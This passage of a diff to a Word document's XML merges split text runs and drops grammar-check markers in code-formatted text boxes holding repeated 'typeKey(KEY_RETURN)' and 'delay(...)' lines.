-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t>delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25308,23 +23386,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t>delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25335,23 +23403,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t>typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25362,23 +23420,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t>delay(1000);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -25459,23 +23507,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t>delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -25503,23 +23541,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t>typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -25530,23 +23558,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t>delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -25574,23 +23592,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t>delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -25601,23 +23609,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t>typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -25628,23 +23626,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t>delay(1000);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -25868,25 +23856,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25903,25 +23873,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25955,25 +23907,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25990,25 +23924,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -26061,25 +23977,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -26096,25 +23994,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -26148,25 +24028,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -26183,25 +24045,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -26451,25 +24295,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26486,25 +24312,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -26557,25 +24365,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -26592,25 +24382,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -26904,25 +24676,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26939,25 +24693,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26991,25 +24727,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -27026,25 +24744,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -27097,25 +24797,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27132,25 +24814,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27184,25 +24848,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27219,25 +24865,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -27574,25 +25202,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -27609,25 +25219,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -27661,25 +25253,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -27696,25 +25270,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
